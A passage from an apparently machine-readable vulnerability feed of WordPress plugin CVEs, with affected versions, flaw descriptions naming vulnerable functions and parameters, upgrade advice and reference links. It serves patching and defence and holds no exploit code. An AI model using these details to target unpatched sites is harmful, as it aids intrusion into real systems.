/class-list-table-archive.php#L780\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6492","slug":"simple-sitemap","versionImpact":"3.5.13","versionEndExcluding":"3.5.14","description":"The Simple Sitemap \u2013 Create a Responsive HTML Sitemap plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.5.13. This is due to missing or incorrect nonce validation in the 'admin_notices' hook found in class-settings.php. This makes it possible for unauthenticated attackers to reset the plugin options to a default state via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 3.5.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a228e60c-c91b-4a82-8b05-a0ffaed82524?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a228e60c-c91b-4a82-8b05-a0ffaed82524?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3099425\\\/simple-sitemap\\\/trunk\\\/lib\\\/classes\\\/plugin-admin-pages\\\/class-settings.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3099425\\\/simple-sitemap\\\/trunk\\\/lib\\\/classes\\\/plugin-admin-pages\\\/class-settings.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6220","slug":"ultimate-addons-for-contact-form-7","versionImpact":"3.5.12","versionEndExcluding":"3.5.13","description":"The Ultra Addons for Contact Form 7 plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'save_options' function in all versions up to, and including, 3.5.12. This makes it possible for authenticated attackers, with Administrator-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 3.5.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/d0n601\\\/CVE-2025-6220\",\"name\":\"https:\\\/\\\/github.com\\\/d0n601\\\/CVE-2025-6220\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-addons-for-contact-form-7\\\/trunk\\\/admin\\\/tf-options\\\/classes\\\/UACF7_Settings.php#L894-920\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-addons-for-contact-form-7\\\/trunk\\\/admin\\\/tf-options\\\/classes\\\/UACF7_Settings.php#L894-920\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3288584\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3288584\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/ryankozak.com\\\/posts\\\/cve-2025-6220\\\/\",\"name\":\"https:\\\/\\\/ryankozak.com\\\/posts\\\/cve-2025-6220\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/697f3432-63b7-42d6-b188-812165cd2020?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/697f3432-63b7-42d6-b188-812165cd2020?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6077","slug":"ultimate-responsive-image-slider","versionImpact":"3.5.11","versionEndExcluding":"3.5.12","description":"The Slider WordPress plugin before 3.5.12 does not ensure that posts to be accessed via an AJAX action are slides and can be viewed by the user making the request, allowing any authenticated users, such as subscriber to access the content arbitrary post such as private, draft and password protected","recommendation":"Update to version 3.5.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1afc0e4a-f712-47d4-bf29-7719ccbbbb1b\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1afc0e4a-f712-47d4-bf29-7719ccbbbb1b\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5678","slug":"kadence-blocks","versionImpact":"3.5.10","versionEndExcluding":"3.5.11","description":"The Gutenberg Blocks with AI by Kadence WP \u2013 Page Builder Features plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018redirectURL\u2019 parameter in all versions up to, and including, 3.5.10 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.5.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kadence-blocks\\\/tags\\\/3.5.8\\\/includes\\\/assets\\\/js\\\/kb-countdown.min.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kadence-blocks\\\/tags\\\/3.5.8\\\/includes\\\/assets\\\/js\\\/kb-countdown.min.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kadence-blocks\\\/tags\\\/3.5.8\\\/includes\\\/blocks\\\/class-kadence-blocks-countdown-block.php#L605\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kadence-blocks\\\/tags\\\/3.5.8\\\/includes\\\/blocks\\\/class-kadence-blocks-countdown-block.php#L605\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fc712f6b-f11b-4731-8f89-0044830400d6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fc712f6b-f11b-4731-8f89-0044830400d6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6348","slug":"smart-slider-3","versionImpact":"3.5.1.28","versionEndExcluding":"3.5.1.29","description":"The Smart Slider 3 plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018sliderid\u2019 parameter in all versions up to, and including, 3.5.1.28 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 3.5.1.29, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3332052\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3332052\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/188baddc-134c-4a82-898b-9b038e795893?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/188baddc-134c-4a82-898b-9b038e795893?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0660","slug":"smart-slider-3","versionEndExcluding":"3.5.1.14","description":"The Smart Slider 3 WordPress plugin before 3.5.1.14 does not properly validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3fe712bc-ce7f-4b30-9fc7-1ff15aa5b6ce\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3fe712bc-ce7f-4b30-9fc7-1ff15aa5b6ce\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4094","slug":"simple-share-buttons-adder","versionImpact":"3.5.0","versionEndExcluding":"3.5.1","description":"The Simple Share Buttons Adder WordPress plugin before 8.5.1 does not sanitise and escape some of its settings, which could allow high privilege users such as editors to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed","recommendation":"Update to version 3.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/04b2feba-e009-4fce-8539-5dfdb4300433\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/04b2feba-e009-4fce-8539-5dfdb4300433\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3053","slug":"uipress-lite","versionImpact":"3.5.07","versionEndExcluding":"3.5.08","description":"The UiPress lite | Effortless custom dashboards, admin themes and pages plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 3.5.07 via the uip_process_form_input() function. This is due to the function taking user supplied inputs to execute arbitrary functions with arbitrary data, and does not have any sort of capability check. This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute arbitrary code on the server.","recommendation":"Update to version 3.5.08, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3292552\\\/uipress-lite\\\/trunk\\\/admin\\\/core\\\/ajax-functions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3292552\\\/uipress-lite\\\/trunk\\\/admin\\\/core\\\/ajax-functions.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6717adb0-27bc-4cd4-8c34-bea59bc0e016?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6717adb0-27bc-4cd4-8c34-bea59bc0e016?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1309","slug":"uipress-lite","versionImpact":"3.5.04","versionEndExcluding":"3.5.05","description":"The UiPress lite | Effortless custom dashboards, admin themes and pages plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the uip_save_form_as_option() function in all versions up to, and including, 3.5.04. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.","recommendation":"Update to version 3.5.05, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/uipress-lite\\\/tags\\\/3.5.00\\\/admin\\\/core\\\/ajax-functions.php#L625\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/uipress-lite\\\/tags\\\/3.5.00\\\/admin\\\/core\\\/ajax-functions.php#L625\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3249865\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3249865\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6754ba34-0dc7-40a5-9548-a5f77db0df53?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6754ba34-0dc7-40a5-9548-a5f77db0df53?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1056","slug":"funnel-builder-pro","versionImpact":"3.4.5","versionEndExcluding":"3.5.0","description":"The FunnelKit Funnel Builder Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'allow_iframe_tag_in_post' function which uses the 'wp_kses_allowed_html' filter to globally allow script and iframe tags in posts in all versions up to, and including, 3.4.5. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2fbacaf2-0b3e-4d1e-adc3-c501a6c4c816?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2fbacaf2-0b3e-4d1e-adc3-c501a6c4c816?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/myaccount.funnelkit.com\\\/changelog\\\/changelog-funnel-builder-pro\\\/?v=7516fd43adaa\",\"name\":\"https:\\\/\\\/myaccount.funnelkit.com\\\/changelog\\\/changelog-funnel-builder-pro\\\/?v=7516fd43adaa\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4469","slug":"wp-staging","versionImpact":"3.4.3","versionEndExcluding":"3.5.0","description":"The WP STAGING WordPress Backup Plugin  WordPress plugin before 3.5.0 does not prevent users with the administrator role from pinging conducting SSRF attacks, which may be a problem in multisite configurations.","recommendation":"Update to version 3.5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d6b1270b-52c0-471d-a5fb-507e21b46310\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d6b1270b-52c0-471d-a5fb-507e21b46310\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6806","slug":"starbox","versionEndExcluding":"3.5.0","description":"The Starbox plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Job Settings user profile fields in all versions up to, and including, 3.4.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1f413fc2-8543-4478-987d-d983581027bf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1f413fc2-8543-4478-987d-d983581027bf?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3029599\\\/starbox\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3029599\\\/starbox\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4665","slug":"eventprime-event-calendar-management","versionImpact":"3.4.9","versionEndExcluding":"3.5.0","description":"The EventPrime  WordPress plugin before 3.5.0 does not properly validate permissions when updating bookings, allowing users to change\/cancel bookings for other users. Additionally, the feature is lacking a nonce.","recommendation":"Update to version 3.5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/50b78cac-cad1-4526-9655-ae0440739796\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/50b78cac-cad1-4526-9655-ae0440739796\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0256","slug":"starbox","versionImpact":"3.4.8","versionEndExcluding":"3.5.0","description":"The Starbox plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Profile Display Name and Social Settings in all versions up to, and including, 3.4.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0eafe473-9177-47c4-aa1e-2350cb827447?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0eafe473-9177-47c4-aa1e-2350cb827447?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3029599\\\/starbox\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3029599\\\/starbox\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9546","slug":"wpide","versionImpact":"3.4.9","versionEndExcluding":"3.5.0","description":"The WPIDE \u2013 File Manager & Code Editor plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 3.4.9. This is due to the plugin utilizing the PHP-Parser library, which outputs parser rebuild command execution results. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"Update to version 3.5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e884af8b-c83f-4380-bfaf-f1419fce125c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e884af8b-c83f-4380-bfaf-f1419fce125c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpide\\\/tags\\\/3.4.9\\\/vendor\\\/nikic\\\/php-parser\\\/grammar\\\/rebuildParsers.php#L77\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpide\\\/tags\\\/3.4.9\\\/vendor\\\/nikic\\\/php-parser\\\/grammar\\\/rebuildParsers.php#L77\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3412","slug":"wp-staging","versionImpact":"3.4.3","versionEndExcluding":"3.5.0","description":"The WP STAGING WordPress Backup Plugin \u2013 Migration Backup Restore plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the wpstg_processing AJAX action in all versions up to, and including, 3.4.3. This makes it possible for authenticated attackers, with administrator-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 3.5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8ebb1072-ea05-4914-961d-0d8f20248078?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8ebb1072-ea05-4914-961d-0d8f20248078?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3076275\\\/wp-staging\\\/trunk\\\/Framework\\\/Network\\\/AjaxBackupDownloader.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3076275\\\/wp-staging\\\/trunk\\\/Framework\\\/Network\\\/AjaxBackupDownloader.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1273","slug":"starbox","versionImpact":"3.4.9","versionEndExcluding":"3.5.0","description":"The Starbox WordPress plugin before 3.5.0 does not sanitise and escape some parameters, which could allow users with a role as low as Contributor to perform Cross-Site Scripting attacks","recommendation":"Update to version 3.5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9784d7c8-e3aa-42af-ace8-5b2b37ebc9cb\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9784d7c8-e3aa-42af-ace8-5b2b37ebc9cb\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2015-10105","slug":"ip-blacklist-cloud","versionEndExcluding":"3.43","description":"A vulnerability, which was classified as critical, was found in IP Blacklist Cloud Plugin up to 3.42 on WordPress. This affects the function valid_js_identifier of the file ip_blacklist_cloud.php of the component CSV File Import. The manipulation of the argument filename leads to path traversal. It is possible to initiate the attack remotely. Upgrading to version 3.43 is able to address this issue. The name of the patch is 6e6fe8c6fda7cbc252eef083105e08d759c07312. It is recommended to upgrade the affected component. The identifier VDB-227757 was assigned to this vulnerability.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/ip-blacklist-cloud\\\/releases\\\/tag\\\/3.43\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/ip-blacklist-cloud\\\/releases\\\/tag\\\/3.43\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?id.227757\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?id.227757\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/ip-blacklist-cloud\\\/commit\\\/6e6fe8c6fda7cbc252eef083105e08d759c07312\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/ip-blacklist-cloud\\\/commit\\\/6e6fe8c6fda7cbc252eef083105e08d759c07312\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.227757\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.227757\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9231","slug":"wp-members","versionImpact":"3.4.9.5","versionEndExcluding":"3.4.9.6","description":"The WP-Members Membership Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 3.4.9.5. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.4.9.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d59e599-59da-4c03-b71f-d00a078b2442?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d59e599-59da-4c03-b71f-d00a078b2442?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-members\\\/tags\\\/3.4.9.5\\\/includes\\\/class-wp-members.php#L1960\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-members\\\/tags\\\/3.4.9.5\\\/includes\\\/class-wp-members.php#L1960\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-members\\\/tags\\\/3.4.9.5\\\/includes\\\/class-wp-members-forms.php#L2198\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-members\\\/tags\\\/3.4.9.5\\\/includes\\\/class-wp-members-forms.php#L2198\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3172354\\\/wp-members\\\/trunk\\\/includes\\\/class-wp-members-forms.php?contextall=1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3172354\\\/wp-members\\\/trunk\\\/includes\\\/class-wp-members-forms.php?contextall=1\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1987","slug":"wp-members","versionImpact":"3.4.9.1","versionEndExcluding":"3.4.9.2","description":"The WP-Members Membership Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 3.4.9.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.4.9.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/631e1061-50b1-4df2-b876-37b4cd3e2478?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/631e1061-50b1-4df2-b876-37b4cd3e2478?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3047285%40wp-members%2Ftrunk&old=3025452%40wp-members%2Ftrunk&sfp_email=&sfph_mail=#file5\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3047285%40wp-members%2Ftrunk&old=3025452%40wp-members%2Ftrunk&sfp_email=&sfph_mail=#file5\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4685","slug":"gutentor","versionImpact":"3.4.8","versionEndExcluding":"3.4.9","description":"The Gutentor \u2013 Gutenberg Blocks \u2013 Page Builder for Gutenberg Editor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the HTML data attributes of multiple widgets, in all versions up to, and including, 3.4.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.4.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3320485\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3320485\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e9ec6af-fa51-4e14-abf6-450c1ca6f8d5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e9ec6af-fa51-4e14-abf6-450c1ca6f8d5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0366","slug":"starbox","versionImpact":"3.4.7","versionEndExcluding":"3.4.8","description":"The Starbox \u2013 the Author Box for Humans plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 3.4.7 via the action function due to missing validation on a user controlled key. This makes it possible for subscribers to view plugin preferences and potentially other user settings.","recommendation":"Update to version 3.4.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c47601b4-bf16-4f59-b5f3-584a8eac7c67?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c47601b4-bf16-4f59-b5f3-584a8eac7c67?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/starbox\\\/trunk\\\/core\\\/UserSettings.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/starbox\\\/trunk\\\/core\\\/UserSettings.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3028775\\\/starbox\\\/trunk?contextall=1&old=3000701&old_path=%2Fstarbox%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3028775\\\/starbox\\\/trunk?contextall=1&old=3000701&old_path=%2Fstarbox%2Ftrunk\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11180","slug":"elementskit-lite","versionImpact":"3.4.7","versionEndExcluding":"3.4.8","description":"The ElementsKit Elementor addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Countdown Timer Widget ekit_countdown_timer_title parameter in all versions up to, and including, 3.4.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.4.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3190501\\\/elementskit-lite\\\/trunk\\\/widgets\\\/countdown-timer\\\/countdown-timer.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3190501\\\/elementskit-lite\\\/trunk\\\/widgets\\\/countdown-timer\\\/countdown-timer.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3262976\\\/elementskit-lite\\\/trunk\\\/widgets\\\/init\\\/assets\\\/js\\\/elementor.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3262976\\\/elementskit-lite\\\/trunk\\\/widgets\\\/init\\\/assets\\\/js\\\/elementor.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/35969379-e668-4045-8de7-696f196ba5b0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/35969379-e668-4045-8de7-696f196ba5b0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9374","slug":"terms-descriptions","versionImpact":"3.4.6","versionEndExcluding":"3.4.7","description":"The Terms descriptions plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 3.4.6. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.4.7, or a newer patched 